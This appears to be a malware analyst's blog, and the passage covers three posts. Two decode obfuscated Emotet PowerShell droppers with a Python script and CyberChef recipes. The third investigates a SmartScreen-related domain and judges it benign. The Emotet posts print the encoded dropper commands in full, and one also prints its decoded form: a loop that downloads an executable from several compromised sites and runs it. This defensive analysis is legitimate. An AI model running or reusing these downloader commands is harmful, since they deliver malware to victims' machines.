Tuesday, July 10, 2018

July Emotet Encoded Powershell Observed

I love taking the time to de-obfuscate newly observed scripts, and Emotet gives me plenty of opportunity to do this. As I posted last month, there are a number of ways to decode these, and I could just simply run these through a sandbox, but I like to really understand the obfuscation for my self.  Which is why I take the time to reverse it a little bit, and to share how I go about it.

I will say that since I started using Cyber Chef, it almost feels like cheating in a way. I had a python script that I kept updating to look for signs of known emotet encodings that I've observed and then decode them. I was up to version 8 of my script, I still write this stuff to keep in practice, but I find Cyber Chef to be a much faster method for "writing" a decoder of sorts.

So, the new variant I had observed looks like this:

powershell ( nEW-obJeCt SYSTEM.IO.COMpreSsION.dEFlateStreaM([SYStEm.Io.mEmORyStREam] [SYstEm.coNverT]::frOMbAse64stRIng( 'RVDbagIxEP2VfQhEsZv0oVAwLAi1F6QthUXE0pdJdupGs0nMjm5F/PeuUizM0zlzLjPMfj4XHrs86DUayt6RxAL1g7PoSbHXGRW8JopjKWOyDabowAcR0koutZz8UbDHHDwJExq5u6LNDizVYEV0UlddC/+CdQPNrrUGnFhH2YVUxYRtK7uYm+Cpz5aP5rYsrwIPq3CAxprN4ZJiwNS41S6spJ4uZm/zqeSijM7SgE/4UDHTzrMi4/d3XDGqtgVDvx8TNnHEv/joTI+4wB/k6jsk7N0G7MX6rJ/z0cMjpcOR9c8R09B5F6B6sg4vOzfZ2XCoSoJE+UcKpm9+wZTunTbqZIBMfTydfgE=' ), [IO.comprEsSION.CompREssIONmoDE]::dECoMprEsS ) | fOREACH-OBject{ nEW-obJeCt SySteM.io.StREamreAder($_, [SyStem.tEXt.EncodiNg]::ASCIi ) } | FOReaCH-ObjEcT{ $_.rEADToENd( ) }) |. ( $eNv:CoMspeC[4,24,25]-join'')

The first thing to notice is that there is simple base64 encoding going on here. However, decoding this as-is, looks like this (using base64 -d from command line):

��� �J.���Q�� <0 ne="" s.3="" trw=""> �<�5 �ޑ� ����I�� �&�c)c� ��u ͮ� �XGمTńm+�����ϖ���,� �p�ƚ���b�Ը�.���.fo��䢌�ҀO�P1�γ"��w\1��C� 6qĿ��L��� ��;$�� ��������#�Ñ�� ��y �z�/;7��p�J�D�G �o~����6�d�L}<�~

This isn't very helpful, however, when to look at the next clue,  you can see  that it is compressed and being decompressed.

This isn't new to me, I've observed other similar tactics being used with tools like powersploit, a quick python script I wrote a while back for aforementioned tactics actually works here. Forgive the long winded approach here, I never streamlined this:

echo "base64code" | base64 -d >> evilb64
python powershelldeflate2.py -i evilb64 $iZG=new-object Net.WebClient;$LJt='http://primerplano[.]org/Yb/@http://ave-ant[.]com/u/@http://muaithai[.]pl/bdwsab/@http://jmamusical[.]jp/wordpress/wp-content/Ec0SS/@http://nagoyamicky[.]com/cacheqblog/bDWJMUD/'.Split('@');$csU = '74';$tdq=$env:temp+'\'+$csU+'.exe';foreach($Hin in $LJt){try{$iZG.DownloadFile($Hin, $tdq);Start-Process $tdq;break;}catch{}}

My python script is largely based on information found here.  It attempts to use ZLIB and GZIP for decompressing the file.

Now, the other way I approached this "other than using write-host in powershell" is to use Cyber Chef to see if I could even write a recipe for this variant. Here is that recipe!

Regular_expression('User defined','\\(\\s\\\'[a-zA-Z0-9/+=]*\\\'',true,true,false,false,false,false,'List matches') Find_/_Replace({'option':'Regex','string':'[\\(\\\'\\)]'},'',true,false,true) From_Base64('A-Za-z0-9+/=',true) Raw_Inflate(0,0,'Adaptive',false,false) Split('@','\\n') Regular_expression('User defined','https?[:a-zA-Z0-9/.-]*',true,true,true,true,false,false,'List matches')

As you can see the Cyber Chef output is pretty clean, as always, if anyone has any better RegEx to use here, I always enjoy optimizing these things. I hope everyone finds this useful.

Friday, June 22, 2018

New Emotet encoding observed and decoded

Nothing earth shattering to report here, I just wanted to share the latest Emotet encoded powershell command and one simple way to decode it to extract the Stage 2 download links.

I know, a lot of these obfuscated powershells can be easily decoded by simply using the write-host command, however, I do like to try different ways to reverse the obfuscation, as I think it just makes for a good analyst exercise.

The powershell command is encoded as:

POwerSHell ieX("$(sV 'ofs' '' )" +[STrInG]( '15x77-81I95>124O96I92O11x22-11-69!78J92>6J68>73-65>78-72t95t11x89t74!69O79>68t70-16-15>92J64-89x122t114!11J22t11!69O78x92t6-68-73t65-78>72J95H11>120t82!88t95H78>70-5O101-78!95>5x124V78J73!104I71t66-78!69x95O16H15I97x88t94t74>66>11x22I11>12x67x95H95>91x17O4H4I79x68>89J68-95x67J82I76V66I71J88t95>89t74V91O5O72x68H70!4I71-100J111O70x4I107!67J95I95J91t17I4>4t92J92J92O5!70t82I91H67!74>70I70I68O72H67V74t5!72O68>70J4!102!106O25I77t121O30>106O4J107V67J95O95-91!17I4>4t92t92-92J5!71-66>74H74-88!88>68I72x66I74I95H78t5x72I68t70!4I98-94!24V90I67H77!104H4>107H67x95I95>91!17I4I4I95H78>88!95>5!79O66O89O64!95x94I66H91x5t69-71>4-126O18V83O104I120x4H107J67J95V95V91V17!4>4!92I92I92>5J65I83V88V95>94-79t66I68V5x89>94J4t66I92J79V114>105>4>12!5!120H91H71t66I95J3O12H107t12x2t16-15I66H91J74J92O89I11t22O11>15I77t81V95I124>96J92>5!69V78t83H95J3!26!7t11V26>27H24I19V30V25-2V16-15x102V105>77t113-108!11>22t11!15I78t69-93I17H95!78O70H91I11I0t11J12I119x12>11-0I11H15t66I91!74H92>89J11J0V11>12O5!78J83-78t12!16I77t68-89-78x74V72t67-3J15x65V120H69x123I72t11J66!69x11V15-97O88t94I74J66J2x80H95t89H82J80J15>92!64O89!122x114!5I111x68t92V69-71I68!74O79-109I66I71!78V3O15x65J120t69>123!72t5x127O68H120t95J89!66>69H76V3I2x7t11!15t102J105H77O113H108!2-16I120I95I74-89x95>6>123!89H68-72I78t88t88t11H15V102J105V77>113H108-16I73t89I78J74O64x16J86I72H74!95J72V67J80t92!89I66V95I78!6I67I68O88-95-11H15-116>5H110V83I72-78>91O95>66>68I69-5J102H78t88J88!74!76x78-16J86>86' -SplIT '>' -spLiT'X' -SpLiT '!'-sPlIt 'V' -SplIt'o' -SPLiT'i'-sPliT 'H'-SpLIT'-'-sPlit't'-sPLIt'J' |forEaCh{ [CHaR] ( $_-bXOr'0x2b' ) })+" $(SEt 'OfS' ' ') " )

There are a couple quick things to note here which make reversing this pretty simple to understand. First, notice the -Split commands, these are setting delimiters, and then notice the -bXOr '0x2b' command, this tells us that the command is encoded with XOR key 0x2b.

 There are a lot of ways to handle this, such as using the Linux TR command and other commands to strip out the punctuation and alpha characters, convert the decimal values and then apply the XOR key. However, I think it's worth pointing out the CyberChef tool to do this instead.

Here is a custom recipe I used in CyberChef to decode this:

Find_/_Replace({'option':'Regex','string':'[^\\w\\s]|[a-zA-Z]'},' ',true,false,true) From_Decimal('Space') XOR({'option':'Hex','string':'2b'},'Standard',true) Regular_expression('User defined','(https?\\x3a\\x2f\\x2f[wW]*\\.?[a-zA-Z0-9]+\\x2d?[a-zA-Z0-9]*\\x2e[a-zA-Z]+\\x2e?\\w*\\x2e?\\w*\\x2e?\\x2f[a-zA-Z0-9]+\\x2f)',true,true,false,true,false,false,'Highlight matches')

When applied, I get my stage2 download links:

If anyone has any improvements on the last bit of RegEx in the recipe let me know, it doesn't always catch all the links.

Wednesday, May 9, 2018

What is canonicalizer.ucsuri.tcs?

Recently I have observed a few hosts which were attempting to POST data to this domain, albeit, unsuccessfully as this is not a valid domain. Everything about the data in the PCAP suggests Microsoft SmartScreen, such as the user agent and even the decoded hex in the HTTP request header:

For example:

Translates to https://ping..checkappexec.microsoft.com/windows/shell/actions

Upon further investigation, I found that several hosts were attempting to query and unsuccessfully resolve this domain.  So I did some digging and the results for this ranged wildly:

A Patent for reputation based software

A suggestion that this is part of a Canon printer

A couple Hybrid-analysis sandbox submissions for phishing pages where this domain was observed in DNS

And an AlienVault link which shows that this link didn't resolve even back a few years ago

Pivoting from the AlienVault link, I wen to the associated VirusTotal page:

The relevant information here is:
Latest files that are not detected by any antivirus solution and embed URL pattern strings with the domain provided.

Which links here:

The piece that stands out here is the file name: ieapfltr.dll, which is part of SmartScreen.
So, I figured I would pull a few known clean hosts together, a Windows 7 and a couple Windows 10 hosts and sure enough they have this dll. In each case I ran the following:

strings -el ieapfltr.dll | grep "http"
strings -el ieapfltr.dll | grep "\.tcs"

strings -el ieapfltr.dll | grep "\.tcs"
Results: canonicalizer.ucsuri.tcs http://canonicalizer.ucsuri.tcs

My conclusion is that this is a part of SmartScreen, but why have only a couple hosts been observed with a POST to this domain? Why are so many hosts attempting to resolve this domain? What is the purpose of this non-valid TLD anyway? I'm left with a lot of questions, but do not believe at this time that there is anything malicious about this domain. I'm hoping someone has some more information about this, if you do, please contact me.